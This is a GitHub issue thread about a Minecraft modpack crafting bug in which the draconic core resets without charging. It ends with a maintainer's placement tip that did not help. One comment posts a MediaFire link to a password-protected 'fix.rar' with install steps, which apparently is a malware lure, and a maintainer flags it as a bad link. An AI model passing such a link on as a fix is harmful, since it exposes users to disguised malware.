### ISSUE TITLE
draconic crafting keeps failing

### ISSUE THREAD

**Issue by mmmthepotatogod** [ChosenArchitect/Project-Architect-2#183]
**Describe the bug**
-> crafting core "skips" charging, starts crafting, then resets, like crafting was never initiated 

**To Reproduce**
setup the core and injectors, start the draconic core recpie

**Expected behavior**
-> crafting as usual, charging, then crafting, then item is imported

**Screenshots**
![bug 1](https://github.com/user-attachments/assets/e42cacd4-874b-497a-848e-76aef1dd2987)
![2024-08-26_20 06 56](https://github.com/user-attachments/assets/88d6244c-0fbb-4adf-ac53-15970304299d)
one on the left works, one on the right doesn't

**Modpack version**
-> latest - (3.5)

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by mmmthepotatogod** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

whats is it?

**Comment by IRicTheCoder** [comment]
I apologize for that, we have been experiencing some users placing bad links on github, please ignore it. We will look into the issue you posted as soon as possible

**Comment by IRicTheCoder** [comment]
Sorry for the late response, I believe you have to have at least one injector centered with the infusion block, as in the same line, worth trying out.

**Comment by mmmthepotatogod** [comment]
Didn't work either....
But i guess that was probably just an odd bug on my end 
And it worked just fine in another world 😄
